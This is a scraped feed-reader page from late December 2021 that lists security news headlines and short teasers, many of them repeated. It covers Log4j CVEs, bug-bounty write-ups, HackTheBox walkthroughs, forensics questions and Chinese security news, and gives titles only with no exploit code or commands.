    HOW I AM ABLE TO CRASH ANYONE’S MOZILLA FIREFOX BROWSER BY SENDING AN EMAIL
    Hi, Hope you guyz are doing well, Here is the story of how i am able to crash anyone’s mozilla firefox by just sending a single email… Continue reading on Medium »  ( 1 min )
    HOW I GOT MY FIRST RCE WHILE LEARNING PYTHON
    Hi, Continue reading on Medium »  ( 1 min )
    Jet Protocol Upgrade Bug Patch Disclosure
    On Dec 21st, we performed an ad hoc upgrade to our mainnet program that introduced a critical vulnerability that was quickly discovered… Continue reading on Jet Protocol »  ( 1 min )
    How To Hack Any Website
    [PART -3 Exploiting Trust] Continue reading on System Weakness »  ( 12 min )
    LENOVO OPEN REDIRECTION
    Hello Hackers!! Continue reading on Medium »  ( 1 min )
    OTP bypass via response manipulation
    Hello everyone I’m Jan Jeffrie Salloman, I started bug hunting 1 year ago. This writeup is about an OTP bypass using response manipulation… Continue reading on Medium »  ( 1 min )
    Polygon Lack Of Balance Check Bugfix Postmortem — $2.2m Bounty
    Whitehat Leon Spacewalker reported a critical vulnerability in Polygon on December 3. Continue reading on Immunefi »  ( 4 min )
  • Open

    Log4j CVE-202144228
    Krisp disclosed a bug submitted by karthik86: https://hackerone.com/reports/1431624
    SQL Injection leads to retrieve the contents of an entire database.
    BlockDev Sp. Z o.o disclosed a bug submitted by u-itachi: https://hackerone.com/reports/1002641
  • Open

    Help with installing Autopsy
    submitted by /u/UserNo007 [link] [comments]  ( 1 min )
    Forensic Analysis of USB tripwire that shreds your LUKS Header
    submitted by /u/maltfield [link] [comments]  ( 1 min )
    Tips on GCFA (SANS FOR508) certification
    Hello everyone, I've just registered for GCFA (SANS FOR508). What is the major tips that anyone can share for this certification? One feedback that I heard from my colleagues that took it couple of months back was that the practice papers doesn't have much similarity to the actual exam. Which is kind of a concern as I have a GCIH (SANS SEC504) and my practice papers are very similar to the actual exam. Appreciate any feedback from anyone who has recently attempted the certification, thanks! submitted by /u/Writtensine6 [link] [comments]  ( 3 min )
  • Open

    SecWiki News 2021-12-29 Review
    业务安全发展洞察报告 2021 by ourren 消费级物联网安全基线 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2021-12-29 Review
    业务安全发展洞察报告 2021 by ourren 消费级物联网安全基线 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    树莓派专刊---搭建kali环境
    拿起你吃灰的树莓派,做点有意义的事情! 面向想低成本学习信息安全的小白师傅们,一起动起来吧!  ( 1 min )
    树莓派专刊---搭建kali环境
    拿起你吃灰的树莓派,做点有意义的事情! 面向想低成本学习信息安全的小白师傅们,一起动起来吧!  ( 1 min )
    FreeBuf早报 | 在线密码管理器LastPass被大规模撞库;好购App被法院认定侵害隐私权
    全球动态1. Log4j 2.17.1 现已发布,修复了新的远程代码执行错误Apache 发布了 Log4j 版本 2.17.1,修复了 2.17.0 中新发现的远程代码执行 (RCE) 漏洞,编号为 CVE-2021-44832。[外刊-阅读原文]2. 好购App未经许可读取用户手机剪贴板内容,法院认定侵害隐私权手机用户小林(化名)在使用好购App时发现,该App未经同意,擅自监测、收集其手机剪  ( 1 min )
    《信息安全技术 信息系统密码应用设计技术要求》(征求意见稿)发布
    《征求意见稿》提出了信息系统密码应用方案设计技术的建议,为开展信息系统密码应用方案设计提供指导参考。
    2026年,数据丢失防护市场规模将达到 62.65 亿美元
    2026年,数据丢失防护市场规模将达到62.65亿美元。  ( 1 min )
    既存安全风险又涉及侵权,三星应用商店现风险流媒体应用
    这些软件伪装成已停止运营的盗版影视应用程序——ShowBox,目前已在多个用户设备上触发了Play Protect安全警告。
    等保2.0与商密应用产品相关的48个问题合集(中)
    进入等级保护2.0时代,根据信息技术发展应用和网络安全态势,不断丰富了制度内涵、拓展保护范围、完善监管措施,逐步健全网络安全等级保护制度政策、标准和支撑体系。  ( 1 min )
    上云时代,企业云安全审计可以这么做!
    上云时代,企业应结合自身安全合规要求与公有云特性,制定云安全审计检查项;并有效利用公有云配置审计服务,提升云上审计自动化水平。  ( 1 min )
    重磅 | 【 2021中国白帽子调查报告】正式发布
    未来白帽子应该多多尝试过往不熟知、不擅长的漏洞领域,更新挖洞知识与技能。  ( 1 min )
    域内提权漏洞CVE-2021-42287与CVE-2021-42278原理分析
    综上所述,这个洞刚开始叫nopac其实就是针对跨域时的攻击,实战意义不大。  ( 3 min )
    线密码管理器LastPass被大规模撞库
    在线密码管理器LastPass承认,攻击者对其用户进行了大规模的撞库攻击,试图访问他们的云托管密码库。
  • Open

    Strategically Aged Domain Detection: Capture APT Attacks With DNS Traffic Trends
    Strategically aged domain detection can capture domains registered by advanced persistent threats or likely to be used for network abuses. The post Strategically Aged Domain Detection: Capture APT Attacks With DNS Traffic Trends appeared first on Unit42.
  • Open

    BountyHunter HackTheBox Walkthrough
    Bounty hunter is a CTF Linux machine with an Easy difficulty rating on the Hack the Box platform. So let’s get started and take a The post BountyHunter HackTheBox Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    BountyHunter HackTheBox Walkthrough
    Bounty hunter is a CTF Linux machine with an Easy difficulty rating on the Hack the Box platform. So let’s get started and take a The post BountyHunter HackTheBox Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    Log4 2.17 JDBCAppender RCE(CVE-2021-44832)
    또… 또나왔네요. 이전 글에서 한번에 쓰기에 너무 긴 내용이라 추가 CVE는 하나씩 분리해둘 생각입니다. History of Log4j RCE [2021-12-10] CVE-2021-44228 (RCE) [2021-12-14] CVE-2021-45046 (DOS / RCE) [2021-12-18] CVE-2021-45105 (DOS) [2021-12-27] CVE-2021-44832 (RCE) Affected ≤2.17, ≤2.12.3, ≤2.3.1 위 버전이 취약합니다. 다만 무조건 취약한 상태는 아니고, 로깅 구성 파일을 수정할 수 있는 권한이 공격자에게 필요하기 때문에 공격 성공을 위해선 MITM 등의 부가적인 요소가 필요합니다. 그래서 이전 RCE 처럼 Critical 이슈는 아니고 Major(CVSS 6.
  • Open

    Log4jscanner: A Log4j vulnerability filesystem scanner and Go package
    Article URL: https://github.com/google/log4jscanner Comments URL: https://news.ycombinator.com/item?id=29723953 Points: 3 # Comments: 0  ( 3 min )
  • Open

    CTF Write-Up: Shiftpocalypse
    CTF challenge available at ctf-mystiko.com.  ( 3 min )
    CTF Write-Up: Hell Yeah!
    CTF challenge available at ctf-mystiko.com.  ( 2 min )
    Story of a weird CSRF bug
    Heyyy Everyoneeee,  ( 5 min )
    Forensics — Memory Analysis with Volatility
    Recently, I’ve been learning more about memory forensics and the volatility memory analysis tool. To get some more practice, I decided to…  ( 6 min )
    Log4Shell Simplified : All you need to know about CVE-2021-44228
    Collection of all the required details to understand Log4shell (CVE-2021–44228 ) vulnerability  ( 4 min )
    TryHackme — Introduction to Django
    CTF  ( 2 min )
    Bug Bounty Tool List
    Bug Bounty Tool List Which are useful for Hunting  ( 1 min )
  • Open

    CTF Write-Up: Shiftpocalypse
    CTF challenge available at ctf-mystiko.com.  ( 3 min )
    CTF Write-Up: Hell Yeah!
    CTF challenge available at ctf-mystiko.com.  ( 2 min )
    Story of a weird CSRF bug
    Heyyy Everyoneeee,  ( 5 min )
    Forensics — Memory Analysis with Volatility
    Recently, I’ve been learning more about memory forensics and the volatility memory analysis tool. To get some more practice, I decided to…  ( 6 min )
    Log4Shell Simplified : All you need to know about CVE-2021-44228
    Collection of all the required details to understand Log4shell (CVE-2021–44228 ) vulnerability  ( 4 min )
    TryHackme — Introduction to Django
    CTF  ( 2 min )
    Bug Bounty Tool List
    Bug Bounty Tool List Which are useful for Hunting  ( 1 min )
  • Open

    CTF Write-Up: Shiftpocalypse
    CTF challenge available at ctf-mystiko.com.  ( 3 min )
    CTF Write-Up: Hell Yeah!
    CTF challenge available at ctf-mystiko.com.  ( 2 min )
    Story of a weird CSRF bug
    Heyyy Everyoneeee,  ( 5 min )
    Forensics — Memory Analysis with Volatility
    Recently, I’ve been learning more about memory forensics and the volatility memory analysis tool. To get some more practice, I decided to…  ( 6 min )
    Log4Shell Simplified : All you need to know about CVE-2021-44228
    Collection of all the required details to understand Log4shell (CVE-2021–44228 ) vulnerability  ( 4 min )
    TryHackme — Introduction to Django
    CTF  ( 2 min )
    Bug Bounty Tool List
    Bug Bounty Tool List Which are useful for Hunting  ( 1 min )
  • Open

    Implant.ARM.iLOBleed.a | Padvish Threats Database
    submitted by /u/dmchell [link] [comments]
  • Open

    OSINT Cheatsheet: A Mindmap for Your Investigation
    This is a guest post by Steve Hall (https://twitter.com/shall_1) Continue reading on Medium »

  • Open

    Red & Blue-Team Quick Reference Gitbooks
    ​ https://preview.redd.it/fr6me9amad881.png?width=2250&format=png&auto=webp&s=b41dfae9c724d1f9519dca8fb2317b91d4c8c778 Hi everyone! I would like to share with you one of my gitbooks, focused on DFIR, Malware and Blue-Team in general. Is a WIP in progress. Im actually adding more and more things while myself learn along the way. 📘 Hunter - Jorge Testa There you have my Red-Team version. WIP too. 📕 Tryharder - Jorge Testa Hope you like it! submitted by /u/J-Testa [link] [comments]  ( 1 min )
    Microsoft Defender for Identity security alert lateral movement playbook
    submitted by /u/dmchell [link] [comments]
  • Open

    Third Log4j RCE Vulnerability Discovered in Apache Logging Library [With Technical details & PoC]
    submitted by /u/Gorkha56 [link] [comments]
    DFIR or AppSec?
    Hi everyone, I'm currently a Computer Science student and I would love to work in cybersecurity. There are 2 roads that I want to explore and I was wondering if you could help me decide which career path to choose as I really like both of them equally: Start as a SOC Analyst and specialize in DFIR Work for a couple of years as a software engineer, after that transition to AppSec Thank you and really looking forward to your answers! submitted by /u/cyberprime24 [link] [comments]  ( 1 min )
    Most comprehensive(or better in another way) list of default creds?
    I can see there are a lot of sites that list default creds, but they seem to be missing a lot like default setting web apps. Usually it doesn't take too long to google, but not always. What are your favorite lists for this? Is it better to just google each time or have you found any gems out there? submitted by /u/Euphorinaut [link] [comments]  ( 1 min )
    "Pentesting" a friends web app, it's a bit scary..
    Hey everyone! First of all I'm not a pentester, I'd like to be one one day but for now I remain a noob who is trying harder every day. Now that thats out of the way let me start.. So I met up with a friend of mine recently who had an idea for a web app and hired a company to develop it. It's still in development but the other day he showed me the progress and asked me for my general opinion on the idea, status of the website and since he also receives regular backups of the code, he asked me to take a quick look at it. It seemed to be built on top of WordPress, nothing fancy but since I'm interested in Pentesting and Web application security I took a quick glance at interesting files like login, etc... Now again, I'm not a web dev or have great skills in php or js but I can read some o…  ( 5 min )
    Has anyone ever read Kevin Mitnick’s The Art of Invisibility? How useful was the advice?
    It’s a book released in 2017 that details how to secure your OPSEC. A lot of 5 star reviews on amazon, can anyone summarize the chapters? There were 16. submitted by /u/Original_Ad_1103 [link] [comments]  ( 3 min )
    In what fields of InfoSec is there potential for entrepreneurship?
    I am currently a high school student passionate about InfoSec studying Network+ material, and as someone who wants to own a business one day I was interested in which specific areas of this field there is startup potential. Of course, I plan on gaining plenty of experience in jobs before contributing my own innovation so your answers will allow me to calibrate my learning/career path to be more effective for my goals. submitted by /u/Connect_Estate_8617 [link] [comments]  ( 4 min )
  • Open

    New Log4j2 vulnerability
    Article URL: https://nvd.nist.gov/vuln/detail/CVE-2021-44832 Comments URL: https://news.ycombinator.com/item?id=29718845 Points: 97 # Comments: 41  ( 3 min )
    Important: Security Vulnerability CVE-2021-44832
    Article URL: https://logging.apache.org/log4j/2.x/ Comments URL: https://news.ycombinator.com/item?id=29718814 Points: 2 # Comments: 0  ( 5 min )
    Log4j Vulnerability Scanning Tool from Jfrog
    Article URL: https://github.com/jfrog/log4j-tools Comments URL: https://news.ycombinator.com/item?id=29715230 Points: 1 # Comments: 0  ( 6 min )
  • Open

    Important: Security Vulnerability CVE-2021-44832
    Article URL: https://logging.apache.org/log4j/2.x/ Comments URL: https://news.ycombinator.com/item?id=29718814 Points: 2 # Comments: 0  ( 5 min )
  • Open

    Intercepting Google CSE resources: automate Google searches with client-side generated URIs (for…
    Introduction Continue reading on Medium »  ( 11 min )
  • Open

    New Log4j CVE - CVE-2021-44832. Another JNDI RCE. Fixed in latest release.
    submitted by /u/emmainvincible [link] [comments]  ( 1 min )
    Turning bad SSRF to good SSRF: Websphere Portal
    submitted by /u/Mempodipper [link] [comments]
    IRIS - A web collaborative platform for incident response analysts allowing to share investigations at a technical level
    submitted by /u/Maijin [link] [comments]
    Pet surveillance with Falco
    submitted by /u/MiguelHzBz [link] [comments]
    Using laser speckle patterns to see keypresses etc.
    submitted by /u/anfractuosus [link] [comments]  ( 1 min )
    Integrating Canary Tokens with Microsoft Sentinel SIEM
    submitted by /u/m_rothe [link] [comments]
    PHP LFI with Nginx Assistance
    submitted by /u/dL2Hj4wR [link] [comments]  ( 1 min )
    V8 Heap pwn and /dev/memes - WebOS Root LPE
    submitted by /u/DavidBuchanan [link] [comments]
    Encoding.Tools (alternative to CyberChef and Burp Suite Encoder)
    submitted by /u/mehaase [link] [comments]
  • Open

    Hack Us Will You?
    Delorians, Continue reading on Medium »  ( 1 min )
    Astroport Boosts Bug Bounty to $3m, Takes Top Leaderboard Spot
    Astroport has just doubled its critical bug bounty reward from $1.5m to $3m, making it the largest bounty on Immunefi’s platform, beating… Continue reading on Immunefi »  ( 1 min )
    Hunting for Bugs in File Upload Feature:
    In this blog, I will be listing down some file upload Vulnerability such RCE, SSRF, CSRF, XSS and many more such vulnerabilities. Continue reading on Medium »  ( 4 min )
    SSRF in Align Technology, Inc.
    Hi everyone Align Technology, Inc. is a manufacturer of 3D digital scanners and the Invisalign clear aligners used in orthodontics.It is… Continue reading on Medium »  ( 1 min )
    [Campaign] — HappyLand testnet invitation!
    HappyLand Testnet will arrive at the end of December and we are super thrilled to welcome you. This is an opportunity to let you imagine… Continue reading on Medium »  ( 2 min )
    Bypassing HttpOnly with phpinfo file
    While doing Web Application assessment with Higgsx, We found stored Cross-Site Scripting(XSS) which was a nice finding but we could not… Continue reading on Medium »  ( 1 min )
    CVE-2021–38314 Leads to Sensitive Information Disclosure
    Hello Hackers! Continue reading on Medium »  ( 1 min )
    How having a student mail can help you in Info-sec.
    Hello Everyone, I’m Vishal & It’s my first ever blog . So if you found any grammatical error or something missing don’t pardon me, Instead… Continue reading on Medium »  ( 5 min )
    Bounty Evaluation GitHub = $15,000 US Dollars | Rate Limit
    I found the bug on GitHub website where, I bypassed the login authentication. In this walk through I will show it was done. Let’s… Continue reading on Medium »  ( 2 min )
    Bug Report Update!
    We are very grateful for the overwhelming support our community has shown for our ongoing testnet & bugbounty programme. Our bugbounty… Continue reading on Medium »  ( 2 min )
    Bug Bounty Programs for Blockchain Projects
    The list of methods and strategies applied by hackers to compromise the security of their targets is constantly expanding and they… Continue reading on Medium »  ( 2 min )
  • Open

    SecWiki News 2021-12-28 Review
    连载:演化的高级威胁治理(四) by ourren 连载:演化的高级威胁治理(三) by ourren 连载:演化的高级威胁治理(二) by ourren 连载:演化的高级威胁治理(一) by ourren SecWiki周刊(第408期) by ourren 透明度PK国家安全?美国的VEP政策改革呼声再起 by ourren 漏洞披露是一个抗解问题--协同漏洞披露(CVD)简述 by ourren THINE:针对时序异质信息网络的表示学习 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2021-12-28 Review
    连载:演化的高级威胁治理(四) by ourren 连载:演化的高级威胁治理(三) by ourren 连载:演化的高级威胁治理(二) by ourren 连载:演化的高级威胁治理(一) by ourren SecWiki周刊(第408期) by ourren 透明度PK国家安全?美国的VEP政策改革呼声再起 by ourren 漏洞披露是一个抗解问题--协同漏洞披露(CVD)简述 by ourren THINE:针对时序异质信息网络的表示学习 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Dell Driver EoP (CVE-2021-21551)
    submitted by /u/nanabingies [link] [comments]
  • Open

    【安全通报】Auerswald COMpact 5500R PBX 固件多个后门漏...
    近日,RedTeam Pentesting 公布了 Auerswald COMpact 5500R PBX 固件中的多个后门漏洞。攻击者可通过这些后...  ( 1 min )
    【安全通报】Apache APISIX Dashboard 身份验证绕过漏洞(C...
    近日,网络上出现 Apache APISIX Dashboard 身份验证绕过漏洞,攻击者可通过该漏洞绕过身份验证过程并通过...  ( 1 min )
  • Open

    【安全通报】Auerswald COMpact 5500R PBX 固件多个后门漏...
    近日,RedTeam Pentesting 公布了 Auerswald COMpact 5500R PBX 固件中的多个后门漏洞。攻击者可通过这些后...  ( 1 min )
    【安全通报】Apache APISIX Dashboard 身份验证绕过漏洞(C...
    近日,网络上出现 Apache APISIX Dashboard 身份验证绕过漏洞,攻击者可通过该漏洞绕过身份验证过程并通过...  ( 1 min )
  • Open

    企业级国产免费蜜罐HFish内测版先览
    有幸从HFish产品小姐姐那儿获得了内测资格,和大家分享一下个人使用心得,以及部分落地方法。结尾有彩蛋哟。  ( 1 min )
    告别脚本小子系列丨JAVA安全(1)——JAVA本地调试和远程调试技巧
    首期系列课程主要分享关于java安全相关内容  ( 1 min )
    【原创】VulnHub靶机实战:CyNix: 1
    VulnHub靶机实战:CyNix: 1  ( 1 min )
    全球最大图片服务公司遭勒索攻击、《蜘蛛侠》新片盗版包含挖矿木马|12月28日全球网络安全热点
    &lt;section&gt;&lt;img src=&quot;https://image.3001.net/images/20211228/1640679742_61cac93e5aadba5c4e4ea.jpg!small  ( 1 min )
    阿尔巴尼亚总理就数据泄露致歉
    在数十万阿尔巴尼亚公民的个人数据在互联网上泄露后,阿尔巴尼亚总理就此事公开道歉。
    Apache HTTP Server 2.4.52 发布,修复关键漏洞
    建议用户和管理员查看 Apache 公告,并尽快更新他们的版本,以免遭受不必要的潜在攻击。  ( 1 min )
    FreeBuf早报 | 近七成网民感到被算法算计;阿尔巴尼亚总理就数据泄露致歉
    北大互联网发展研究中心发布的《中国公众“大安全”感知报告》显示,近七成公众表示担心账号和个人信息泄露。  ( 1 min )
    威联通NAS设备在圣诞期间遭到了勒索攻击
    eCh0raix 勒索软件攻击者似乎都在系统管理员组中创建了一个账号,从而加密NAS 系统上的所有文件。  ( 1 min )
    物流巨头DW Morgan暴露了100 GB 客户数据
    Website Planet安全团队发现了一个配置错误的亚马逊S3“存储池”,池中包含约250万个文件,大小超过100GB。  ( 1 min )
    全球最大图片服务公司Shutterfly遭Conti 勒索软件攻击
    Shutterfly成立于1999年,并声称自己的在线图片存储是世界上最大的,拥有70PB的数据,约16亿张图片。  ( 1 min )
    Unity游戏反破解之道:代码破解与资源窃取,从攻击风险入手
    本文将重点围绕“反破解”讲述这些安全风险以及如何对unity游戏进行全方位的矩阵化保护升级。  ( 1 min )
    API声明文件Swagger Injection攻击
    开发者应将API声明文件视作不可信输入源对待,并在自动化代码生成环节添加相应的安全管控手段。  ( 1 min )
    基于free5gc+UERANSIM的5G SMF及UPF 网元安全需求分析
    本文对《3GPP安全保障规范(SCAS)》中定义的SMF和UPF网元安全需求进行了报文和代码分析。  ( 6 min )
  • Open

    Looking back at 2021 in cybersecurity with Netsparker
    As 2021 draws to a close, it is time for our customary round-up of the year’s most popular and relevant posts on the Netsparker blog, with a sprinkling of last-minute news and predictions for the coming year. READ MORE  ( 4 min )
  • Open

    How I Bypassed Netflix Profile Lock?
    Hi hackers,  ( 3 min )
    Analysis of Poetrat malware
    Hashes  ( 3 min )
    TryHackme LFI Writeup
    How to find and exploit LFI  ( 3 min )
    How I hacked into one of India’s biggest online book stores(RCE and more)
    This article is going to be about how I found my 1st RCE on one of India’s biggest e-commerce sites(+ a few more bugs).  ( 5 min )
  • Open

    How I Bypassed Netflix Profile Lock?
    Hi hackers,  ( 3 min )
    Analysis of Poetrat malware
    Hashes  ( 3 min )
    TryHackme LFI Writeup
    How to find and exploit LFI  ( 3 min )
    How I hacked into one of India’s biggest online book stores(RCE and more)
    This article is going to be about how I found my 1st RCE on one of India’s biggest e-commerce sites(+ a few more bugs).  ( 5 min )
  • Open

    How I Bypassed Netflix Profile Lock?
    Hi hackers,  ( 3 min )
    Analysis of Poetrat malware
    Hashes  ( 3 min )
    TryHackme LFI Writeup
    How to find and exploit LFI  ( 3 min )
    How I hacked into one of India’s biggest online book stores(RCE and more)
    This article is going to be about how I found my 1st RCE on one of India’s biggest e-commerce sites(+ a few more bugs).  ( 5 min )
  • Open

    google drive movie link
    [ Removed by reddit in response to a copyright notice. ] submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    186 persiangig OD Sites Potential NSFW
    http://aailaar.persiangig.com/ http://aamiri.persiangig.com/ http://agrandsimanmag.persiangig.com/ http://ahd666.persiangig.com/ http://albus.persiangig.com/ http://alexpk.persiangig.com/ http://alham.persiangig.com/ http://alishahbazi.persiangig.com/ http://alisharghi.persiangig.com/ http://alma85.persiangig.com/ http://aminatabak.persiangig.com/ http://aminnice.persiangig.com/ http://amir1410.persiangig.com/ http://amirsaman.persiangig.com/ http://amomasoud.persiangig.com/ http://aroonsat.persiangig.com/ http://arshiya.persiangig.com/ http://ascut3.persiangig.com/ http://ashinaazar.persiangig.com/ http://askari56.persiangig.com/ http://azarnoosh.persiangig.com/ http://azg198.persiangig.com/ http://baroun82.persiangig.com/ http://baxe0181.persiangig.com/ http://ben…

  • Open

    Windows resolves/"connects" to external IP even without internet access?
    I was poking around in my router the other day and found something I can't really understand: my Windows machine tried to connect to an external IP address (13.?.?.?) when there was no internet access and no DNS. My modem's internet cable was disconnected and both modem and router were rebooted before I powered up the Windows machine. All DNS caches should be empty. The router connections page shows 1 connection from my Windows machine to 13.?.?.? with status SYN_SENT. Of course, it didn't connect, but how did it know what external IP to try without DNS? The IP is a Microsoft one but I didn't write down what it was (and I didn't save search history) since I initially didn't think it was strange. I tried repeating the same thing several times, but never saw anymore external IPs (but a bunch of 198.x.x.x which is what I'd expect when internet is down). The only difference the first time is that it was installing a previously downloaded Windows update. Is this unusual? Is MS known to go directly to IP addresses like this? This machine only has Windows installed and drivers from Windows Update, so not much on here. submitted by /u/Vivid-Elk-8337 [link] [comments]  ( 2 min )
    Linux servers security
    Hi, We have 100+ Linux servers running with apache/tomcat and Nginx, and a few servers are public-facing with ip control. I am trying to see if any open source tool to scan all 100+ servers on a daily basis and report if any vulnerabilities. Thanks. submitted by /u/Prestigious-Yam-3510 [link] [comments]  ( 1 min )
    Best IT backgrounds to prepare for InfoSec
    I am currently a computer science student and I want to pursue a career in cybersecurity but I know that in order to get into security I will need some kind of experience before I can get a job in the field. I'm just wondering what are the best IT backgrounds to have or things that I should focus on that would help me develop skills needed for security careers. I know it depends on what kind of focus I want in security and for now I'm thinking more towards the defensive side like engineer maybe but I would prefer having answers based in either roles (attack and defense). So to rephrase it a bit better I wanna know what are the best tenporary jobs that I could do to develop skills needed to switch into security (soft dev, web dev, data sci, etc...)? submitted by /u/iTsObserv [link] [comments]  ( 7 min )
  • Open

    Playing around COM objects - PART 1
    submitted by /u/dmchell [link] [comments]
    Dumping LSASS with Duplicated Handles
    submitted by /u/dmchell [link] [comments]
    snovvcrash/NimHollow: Nim implementation of Process Hollowing using syscalls (PoC)
    submitted by /u/dmchell [link] [comments]
  • Open

    Winning the Impossible Race – An Unintended Solution for Includer’s Revenge / Counter (hxp 2021)
    submitted by /u/Caustic66 [link] [comments]
    remote Chaos Computer Congress Streaming
    submitted by /u/mubix [link] [comments]
    A Deep Dive into DoubleFeature: Equation Group's Post-Exploitation Dashboard
    submitted by /u/Megabeets [link] [comments]
  • Open

    Why did my last movie post dissappear?
    submitted by /u/International_Milk_1 [link] [comments]
    If you'll allow me-for movie or tv show fans.
    There might be one person out there who doesn't know this. So let's say you download a movie, expecting it to be in the english language, but find that Harrison Ford is speaking Persian, and it doesn't even sound like Mr F In whatever player you use, go to the audio option , and check if there is alternative track. To make sure there is an english language track, before downloading, copy the link of the movie/tv episode, and open in your player. Then you can check before downloading. submitted by /u/International_Milk_1 [link] [comments]  ( 2 min )
    I'd like to make a motion for a couple of new flairs: "Junk Science" and "Conspiracy"
    submitted by /u/brother_p [link] [comments]  ( 1 min )
  • Open

    Ethical Hacking Roadmap and Resources
    Checklist for the things that one has to learn while learning Linux: Shell, Navigation, File System, Redirection, Permissions, Processes… Continue reading on Medium »  ( 4 min )
    Full account takeover vulnerability in Minecraft
    Continue reading on Medium »  ( 2 min )
    VULNERABILIDADES WEB 7.0
    C R O S S - S I T E S SCRIPTING Continue reading on Medium »  ( 6 min )
    OSINT Research With Recon-ng
    This piece goes over the basics of Recon-ng and how to use it to facilitate OSINT research! I’ll be covering two modules: google_site_web… Continue reading on Medium »  ( 4 min )
    Unlucky Story, Judge Duplicate, and Only Get a Thank You. But It makes Me smile.
    This is from my local bounty program in my country, Indonesia. I found some vulnerabilities in an e-commerce website and I think it would… Continue reading on Medium »  ( 1 min )
    From Simple Recon to Reflected XSS
    whoami Continue reading on Medium »  ( 2 min )
    How I Bypassed Netflix Profile Lock?
    Hi hackers, Continue reading on InfoSec Write-ups »  ( 2 min )
    HOW I GOT MY SECOND SWAG
    Hi everyone! Hope you all are doing good. In this article i am going to show you how i got my second swag from Ivanti by reporting an open… Continue reading on Medium »  ( 2 min )
    DOM Based XSS
    DOM based XSS (cross site scripting) is a client side vulnerability that arises when the javascript takes data from user controllable… Continue reading on Medium »  ( 3 min )
  • Open

    Help with Autopsy on Mac
    Hi, I need to use Autopsy to analyse an E01 image for my project but am struggling to get in set up on my Mac (running Mojave). I downloaded the .zip file from autopsy and have all the files but can't seem to get the GUI running. I installed it via 'brew' but at the end of the install it said error Xcode version too low. So I don't know if it has installed properly. Any help would be appreciated. ​ Thanks submitted by /u/UserNo007 [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2021-12-27 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2021-12-27 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    OSINT Research With Recon-ng
    This piece goes over the basics of Recon-ng and how to use it to facilitate OSINT research! I’ll be covering two modules: google_site_web… Continue reading on Medium »  ( 4 min )
    TryHackMe: OhSINT — WriteUp
    Is your information safe enough on internet? Continue reading on Medium »  ( 4 min )
    OSINT Series … Part-1
    What is OSINT ? Continue reading on Medium »  ( 2 min )
  • Open

    FreeBuf早报 | 育碧被曝删除不活跃付费玩家账号;白宫邀厂商商讨加强开源安全
    一位匿名发现其育碧平台的游戏账号被删除,他邮箱曾收到一封警告信,要求他在 30 天内登录账号否则永久删除账号。  ( 1 min )
    多方围剿,老赖现形:一场与反催收黑产的持久战争
    金融行业一场旷日持久的反催收黑产战争,终于行至水深处。  ( 1 min )
    中央网信办发布《“十四五”国家信息化规划》
    《规划》是“十四五”国家规划体系的重要组成部分,是指导“十四五”期间各地区、各部门信息化工作的行动指南。
    工信部、国家标准委联合印发《工业互联网综合标准化体系建设指南(2021版)》
    《建设指南》提出,到2023年,工业互联网标准体系持续完善,制定术语定义、通用需求、供应链/产业链、人才等基础共性标准15项以上。
    广州市国资委监管企业数据安全合规管理指南(试行2021年版)》发布
    《指南》细化完善了上位法要求,成为地方国资监管部门首部针对数据合规专项领域的合规操作指南。
    易盾SaaS系统资损防控体系建设
    业务安全主要是提供认证类的服务,包括验证码,号码日志,信息认证。移动安全是通过加固和其他手段保护客户的应用,防止被逆向破解。  ( 1 min )
    谁动了我的打印机?
    到2021年10月,问题开始变得严重起来,大量安装了10月补丁的Windows 10用户发现他们不能正常的使用网络打印机了。  ( 1 min )
    Token机制相对于Cookie机制的优势
    我们大家在客户端频繁向服务端请求数据时,服务端就会频繁的去数据库查询用户名和密码并进行对比,判断用户名和密码正确与否,并作出相应提示,也就是在这样的背景下Token便应运而生。 简单  ( 1 min )
    Web应用攻击激增,该保护 API 了!
    自2019年10月以来,针对英国企业的Web应用攻击增加了251%。  ( 1 min )
    技术分享 | 常见的DDoS攻击类型及防御措施
    DDoS攻击将呈现高频次、高增长、大流量等特点,对网络安全的威胁也会与日俱增,因此做好DDoS攻击的防护工作已是刻不容缓。  ( 1 min )
    勒索软件或成2022年最大威胁、法国IT服务公司遭勒索攻击|12月27日全球网络安全热点
    安全专家发现了一种通过虚假Google Play商店页面传播的新型银行木马。陌生人假装展示某知名银行的应用程序。  ( 1 min )
    网上的“考勤打卡神器”,其实是黑灰产作弊工具
    网上的“考勤打卡神器”虽然能够解决部分从业者打卡的“烦恼”,但这是一种虚假考勤行为,是一种职场失信。
    专家详述 macOS 漏洞 :可让恶意软件绕过安全门卫
    问题的根源在于基于脚本的未签名、未公证的应用程序,无法明确指定解释器,从而导致其完美绕过。  ( 1 min )
    使用量增长了 46%,更加注重隐私的搜索引擎DuckDuckGo发展迅速
    以隐私为重点的搜索引擎 DuckDuckGo在2021年继续快速增长,目前平均每天有超过 1 亿次的搜索查询。  ( 1 min )
    从网络安全到云服务,天融信以安全助力云计算产业发展
    天融信以融合思维自研云产品,用安全助力云计算产业发展。
    搜索引擎你真的会用吗?学会这几个高级语法让你事半功倍
    本文介绍了几个常用的搜索引擎高级语法,熟练掌握将助你信息检索事半功倍,效率大大提高。  ( 1 min )
    Gartner 发布2022年新兴技术和趋势影响力雷达图中五项具有影响力的技术
    今年的新兴技术和趋势影响力雷达图包含23项最有可能给市场带来变革和转型的新兴趋势和技术。
    从零到一带你深入 log4j2 Jndi RCE CVE-2021-44228漏洞
    通过介绍ava日志体系,分析log4j2源码,带你深入本次互联网重磅“核弹”漏洞。  ( 2 min )
  • Open

    How Intrusion Prevention Systems (IPS) Work in Firewall
    Intrusion prevention and the firewall are part of Network Threat Protection. As of version 14, Network Threat Protection and Memory…  ( 5 min )
    Backdoor: HackTheBox Walkthrough
    Welcome back! Today we are going to solve another machine from HacktheBox. The box is listed as an easy box. Just add backdoor.htb in… Continue reading on InfoSec Write-ups »  ( 5 min )
  • Open

    How Intrusion Prevention Systems (IPS) Work in Firewall
